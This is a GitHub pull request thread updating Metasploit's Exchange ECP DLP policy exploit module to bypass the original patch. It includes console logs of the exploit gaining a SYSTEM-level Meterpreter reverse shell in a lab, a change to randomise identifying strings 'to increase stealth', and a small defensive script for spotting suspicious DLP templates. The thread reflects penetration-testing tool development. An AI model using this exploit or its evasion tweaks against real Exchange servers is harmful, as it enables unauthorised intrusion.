
Updates for Exchange ECP DLP Policy Exploit #14607

Merged
4 commits merged on Feb 11, 2021

Conversation

zeroSteiner
Contributor

@zeroSteiner zeroSteiner commented Jan 12, 2021

This updates the exchange_ecp_dlp_policy module to leverage the technique disclosed today, which bypasses the original patch. I updated the exploit logic to use the new technique after verifying the original did not work against Exchange Server 2016 CU19. After updating the exploit, I reverted to my older version of Exchange and validated that it still worked, which it does, so we can safely use the bypass technique as a one-size-fits-all. The older version I tested was Exchange Server 2016 CU12. I also added a paragraph to the docs describing the relationships between the patches, updates and CVEs.

The exploit and check method both work. The exploit does need to be authenticated, and the user needs to have admin privileges. I just used a domain admin account in my lab, which was the easiest way to get the necessary privileges.

Tested on Exchange Server 2016 with CU19 released December 2020 (latest cumulative update).

msf6 exploit(windows/http/exchange_ecp_dlp_policy) > show options

Module options (exploit/windows/http/exchange_ecp_dlp_policy):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   Password1        no        OWA password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.42   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   USERNAME   alice            no        OWA username
   VHOST      WIN-BPID95ACQ7E  no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The local listener hostname
   LPORT     8443             yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Exchange Server <= 2016 CU19 and 2019 CU8


msf6 exploit(windows/http/exchange_ecp_dlp_policy) > exploit
[*] Reloading module...

[*] Started HTTPS reverse handler on https://192.168.159.128:8443
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Exchange Server 15.1.2176 is a vulnerable build.
[*] Logging in to OWA with creds alice:Password1
[+] Successfully logged in to OWA
[*] Retrieving ViewState from DLP policy creation page
[+] Successfully retrieved ViewState
[*] Creating custom DLP policy from malicious template
[*] https://192.168.159.128:8443 handling request from 192.168.159.42; (UUID: zeitmqvn) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (192.168.159.128:8443 -> 192.168.159.42:9211) at 2021-01-12 17:59:13 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-BPID95ACQ7E
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : EXCHG
Logged On Users : 7
Meterpreter     : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.42 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(windows/http/exchange_ecp_dlp_policy) >

Updates #14126.

@zeroSteiner zeroSteiner marked this pull request as ready for review January 13, 2021 15:03
@gwillcox-r7 gwillcox-r7 added the hotness Something we're really excited about label Jan 20, 2021
@wvu wvu self-assigned this Jan 21, 2021
@cdelafuente-r7 cdelafuente-r7 self-assigned this Feb 5, 2021
@cdelafuente-r7
Contributor

Thanks for updating this module @zeroSteiner!

I successfully tested against Exchange Server version 15.1.2176 on Windows server 2016. I have a few comments:

  1. I had to increase the HttpClientTimeout since the query to ManagePolicyFromISV.aspx can take a long time to respond, which breaks the exploit. It does not happen all the time, so I think it was more related to my environment than a real issue.

  2. I also got this error:

msf6 exploit(windows/http/exchange_ecp_dlp_policy) > run
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Exchange Server 15.1.2176 is a vulnerable build.
[*] Logging in to OWA with creds <redacted>
[+] Successfully logged in to OWA
[*] Retrieving ViewState from DLP policy creation page
[+] Successfully retrieved ViewState
[*] Creating custom DLP policy from malicious template
[-] Exploit failed: NameError uninitialized constant Msf::Modules::Exploit__Windows__Http__Exchange_ecp_dlp_policy::MetasploitModule::Faker

Adding require 'faker' in the module fixes it.

  3. I noticed some information sent in the DLP policy XML contains data that, in my opinion, should be changed to increase stealth:
  def dlp_policy_template
          ...
          <publisherName>Metasploit</publisherName>
          ...
          <description>
            <localizedString lang="en">wvu was here</localizedString>
          </description>
          ...

This information appears on the server this way (screenshot taken 2021-02-10, not reproduced here).
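The publisher and description quoted above are what an administrator reviewing custom DLP templates on the server would see. As an added triage example (not part of this PR or the module), the Python below parses a constructed template of that shape and flags the markers the thread mentions; the root element name, the expected-publisher set and the sample values are assumptions for the demo.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the shape quoted in the comment above: a publisherName
# plus a localized description. The root element name is an assumption.
SAMPLE_POLICY = """<dlpPolicyTemplate>
  <publisherName>Metasploit</publisherName>
  <description>
    <localizedString lang="en">wvu was here</localizedString>
  </description>
</dlpPolicyTemplate>"""

# Publishers an organisation expects on its custom templates (assumed for the demo).
EXPECTED_PUBLISHERS = {"Microsoft"}

# Literal strings the thread shows the module used before they were randomised.
KNOWN_MARKERS = ("metasploit", "wvu was here")


def triage_dlp_policy(xml_text):
    """Return (publisher, description, reasons) for one policy template.

    reasons is empty when nothing in the template looks out of place.
    """
    root = ET.fromstring(xml_text)
    publisher = (root.findtext("publisherName") or "").strip()
    desc_el = root.find("description/localizedString")
    description = (desc_el.text or "").strip() if desc_el is not None else ""

    reasons = []
    # A custom template from a publisher nobody on the team recognises is worth a look
    # regardless of what the description says.
    if publisher not in EXPECTED_PUBLISHERS:
        reasons.append("unexpected publisher: %r" % publisher)
    # Known tooling strings are a stronger signal, but only for older module versions.
    for field_name, value in (("publisherName", publisher), ("description", description)):
        lowered = value.lower()
        if any(marker in lowered for marker in KNOWN_MARKERS):
            reasons.append("known tooling marker in %s: %r" % (field_name, value))
    return publisher, description, reasons


if __name__ == "__main__":
    for line in triage_dlp_policy(SAMPLE_POLICY)[2]:
        print(line)
```

Because commit 1f5f086 replaces these literals with random text, the marker check only catches templates created with older versions of the module; the unexpected-publisher check is the one that stays useful.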

@zeroSteiner
Contributor Author

In commit 1f5f086, I required faker as you suggested and utilized it more to generate a random publisher and description. Faker::Hacker.say_something_smart seemed like a good fit for the description 😄.

@jmartin-tech
Contributor

@msjenkins-r7 test this please.

@cdelafuente-r7
Contributor

cdelafuente-r7 commented Feb 11, 2021

Thanks for updating the code @zeroSteiner! Everything is good now. I'll go ahead and land it.

Here is the output against Exchange version 15.1.2176 on Windows Server 2016:

msf6 exploit(windows/http/exchange_ecp_dlp_policy) > options

Module options (exploit/windows/http/exchange_ecp_dlp_policy):

   Name       Current Setting      Required  Description
   ----       ---------------      --------  -----------
   PASSWORD   <redacted>           no        OWA password
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     <redacted>           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443                  yes       The target port (TCP)
   SSL        true                 no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                    yes       Base path
   USERNAME   <redacted>           no        OWA username
   VHOST      <redacted>           no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     <redacted>       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Exchange Server <= 2016 CU19 and 2019 CU8


msf6 exploit(windows/http/exchange_ecp_dlp_policy) > check
[*] <redacted>:443 - The target appears to be vulnerable. Exchange Server 15.1.2176 is a vulnerable build.
msf6 exploit(windows/http/exchange_ecp_dlp_policy) > run

[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Exchange Server 15.1.2176 is a vulnerable build.
[*] Logging in to OWA with creds <redacted>
[+] Successfully logged in to OWA
[*] Retrieving ViewState from DLP policy creation page
[+] Successfully retrieved ViewState
[*] Creating custom DLP policy from malicious template
[*] DLP policy name: Ruecker-Shields Data
[*] Powershell command length: 2096
[*] Sending stage (200262 bytes) to <redacted>
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> <redacted>:56146) at 2021-02-11 15:08:42 +0100
msf6 exploit(windows/http/exchange_ecp_dlp_policy) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-BPID95ACQ7E
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : EXCHG
Logged On Users : 12
Meterpreter     : x64/windows

@cdelafuente-r7 cdelafuente-r7 merged commit 88eaf97 into rapid7:master Feb 11, 2021
@cdelafuente-r7
Contributor

cdelafuente-r7 commented Feb 11, 2021

Release Notes

Updated the Exchange ECP DLP Policy module exploit to leverage a new technique which bypasses the original patch. This new technique also works on unpatched versions.

@wvu
Contributor

wvu commented Feb 11, 2021

Nice job! Thank you, all.

@agalway-r7 agalway-r7 added the rn-enhancement release notes enhancement label Feb 12, 2021
@zeroSteiner zeroSteiner deleted the feat/make-clouds-rain branch February 23, 2021 17:03